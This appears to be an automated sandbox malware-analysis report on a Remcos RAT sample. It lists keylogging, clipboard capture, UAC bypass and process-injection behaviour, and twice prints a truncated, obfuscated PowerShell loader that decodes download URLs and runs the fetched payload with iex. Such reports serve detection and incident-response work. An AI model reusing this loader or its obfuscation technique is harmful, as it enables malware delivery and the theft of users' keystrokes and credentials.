                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownHTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.6:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.6:49723 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000000_2_0040A2B8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168C1
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,4_2_0040987A
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_004098E2
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_00406DFC
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,5_2_00406E9F
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004068B5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_004072B5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A3E0

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041C9E2 SystemParametersInfoW,0_2_0041C9E2

                      System Summary

                      barindex
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: amsi32_2064.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: amsi32_5644.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 5644, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeDropped file: Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)Jump to dropped file
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3859
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3859
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3859Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3859Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,0_2_004180EF
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_004132D2
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041BB09
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,0_2_0041BB35
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004016FD NtdllDefWindowProc_A,5_2_004016FD
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004017B7 NtdllDefWindowProc_A,5_2_004017B7
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00402CAC NtdllDefWindowProc_A,6_2_00402CAC
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00402D66 NtdllDefWindowProc_A,6_2_00402D66
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004167B4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0043E0CC0_2_0043E0CC
